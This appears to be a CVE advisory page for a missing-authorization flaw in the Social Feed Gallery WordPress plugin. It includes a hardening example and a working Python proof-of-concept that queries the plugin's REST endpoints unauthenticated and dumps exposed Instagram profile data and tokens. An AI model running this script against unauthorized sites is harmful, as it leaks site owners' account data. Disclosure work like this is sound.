Security Vulnerability Report
CVE-2025-10637 CVSS 5.3 MEDIUM

CVE-2025-10637

Published: 2025-10-25 07:15:40
Last Modified: 2026-04-15 00:35:42

Description

The Social Feed Gallery plugin for WordPress is vulnerable to Information Exposure in versions less than, or equal to, 4.9.2. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to exfiltrate Instagram profile and media data from any account the site owner connected to their site.
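The root cause (CWE-862) is a REST route whose permission check lets any visitor through. The illustration below is an added example, not the plugin's own code: it shows the weak WordPress route registration beside one gated by a real `permission_callback`, with the handler stripping credentials before responding. The route namespace, function names, option name and the `manage_options` capability are assumptions; the right capability (or a nonce check for a public front-end widget) depends on who must legitimately reach the endpoint.

```php
<?php
// Added illustration, not the plugin's own code. Names are hypothetical.

// Weak: '__return_true' answers every request, so an unauthenticated
// client receives whatever the handler returns, including data fetched
// with the site owner's connected-account credentials (CWE-862).
function example_register_weak_route() {
    register_rest_route( 'example-plugin/v1', '/user-profile', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'example_user_profile_handler',
        'permission_callback' => '__return_true',
    ) );
}

// Hardened: the route only answers logged-in users holding the capability
// that matches the feature (assumed here: manage_options). Anyone else gets
// 401 (not logged in) or 403 (logged in, insufficient rights).
function example_register_hardened_route() {
    register_rest_route( 'example-plugin/v1', '/user-profile', array(
        'methods'             => WP_REST_Server::READABLE,
        'callback'            => 'example_user_profile_handler',
        'permission_callback' => function ( WP_REST_Request $request ) {
            if ( ! is_user_logged_in() || ! current_user_can( 'manage_options' ) ) {
                return new WP_Error(
                    'rest_forbidden',
                    __( 'You are not allowed to read this resource.', 'example-plugin' ),
                    array( 'status' => rest_authorization_required_code() )
                );
            }
            return true;
        },
    ) );
}

// Handler shared by both registrations. Hypothetical stored profile; a real
// plugin would fetch it from the provider. Secrets are removed before the
// response leaves the server, so even an authorized caller never sees a token.
function example_user_profile_handler( WP_REST_Request $request ) {
    $profile = get_option( 'example_plugin_profile', array() );
    unset( $profile['access_token'] );
    return rest_ensure_response( $profile );
}

add_action( 'rest_api_init', 'example_register_hardened_route' );
```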

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)


Social Feed Gallery (insta-gallery) <= 4.9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-10637 PoC - Unauthenticated Information Disclosure
# Target: WordPress sites with Social Feed Gallery plugin <= 4.9.2
import requests
import json
import sys
from urllib.parse import urljoin


def check_vulnerability(target_url):
    """
    Check if target is vulnerable to CVE-2025-10637
    Tests the exposed REST API endpoint for information disclosure
    """
    # Vulnerable endpoint path
    endpoints = [
        '/wp-json/insta-gallery/v1/user-profile',
        '/wp-json/insta-gallery/v1/frontend/user-profile',
        '/?rest_route=/insta-gallery/v1/user-profile',
        '/?rest_route=/insta-gallery/v1/frontend/user-profile'
    ]

    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
        'Accept': 'application/json',
        'Content-Type': 'application/json'
    }

    print(f"[*] Testing target: {target_url}")
    print(f"[*] CVE-2025-10637 - Social Feed Gallery Information Disclosure\n")

    for endpoint in endpoints:
        url = urljoin(target_url.rstrip('/'), endpoint)
        print(f"[+] Testing endpoint: {endpoint}")

        try:
            response = requests.get(url, headers=headers, timeout=10, verify=False)

            if response.status_code == 200:
                data = response.json()
                print(f"[✓] Vulnerable! Endpoint returned data:")
                print(json.dumps(data, indent=2, ensure_ascii=False))

                # Check for sensitive information exposure
                if 'username' in str(data) or 'access_token' in str(data) or 'profile' in str(data).lower():
                    print("\n[!] CRITICAL: Sensitive Instagram data exposed!")
                    return True
            elif response.status_code == 401:
                print(f"[-] Protected endpoint (401 Unauthorized)")
            else:
                print(f"[-] No data (Status: {response.status_code})")

        except requests.exceptions.RequestException as e:
            print(f"[!] Request error: {e}")
        except json.JSONDecodeError:
            print(f"[-] Non-JSON response")

    print("\n[*] No vulnerable endpoints found")
    return False


def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-10637.py <target_url>")
        print("Example: python cve-2025-10637.py https://example.com")
        sys.exit(1)

    target = sys.argv[1]
    is_vulnerable = check_vulnerability(target)

    if is_vulnerable:
        print("\n[✓] Target is VULNERABLE to CVE-2025-10637")
        print("[!] Recommended action: Update Social Feed Gallery to version 4.9.3 or later")
    else:
        print("\n[-] Target appears NOT vulnerable or plugin not installed")


if __name__ == "__main__":
    main()
```

References

https://plugins.trac.wordpress.org/browser/insta-gallery/tags/4.9.2/lib/api/rest/endpoints/frontend/class-user-profile.php#L19 (affected endpoint handler in version 4.9.2)
https://plugins.trac.wordpress.org/changeset/3381423/insta-gallery/trunk/lib/api/rest/endpoints/frontend/class-user-profile.php (changeset to the same file)
https://wordpress.org/plugins/insta-gallery/ (plugin page)
https://www.wordfence.com/threat-intel/vulnerabilities/id/ae0dd6b0-9028-456e-9843-d45754c01c53?source=cve (Wordfence advisory)

Weakness: CWE-862 (Missing Authorization)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-10637",
    "sourceIdentifier": "[email protected]",
    "published": "2025-10-25T07:15:39.797",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Social Feed Gallery plugin for WordPress is vulnerable to Information Exposure in versions less than, or equal to, 4.9.2. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to exfiltrate Instagram profile and media data from any account the site owner connected to their site."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-862"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/insta-gallery/tags/4.9.2/lib/api/rest/endpoints/frontend/class-user-profile.php#L19",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3381423/insta-gallery/trunk/lib/api/rest/endpoints/frontend/class-user-profile.php",
        "source": "[email protected]"
      },
      {
        "url": "https://wordpress.org/plugins/insta-gallery/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/ae0dd6b0-9028-456e-9843-d45754c01c53?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```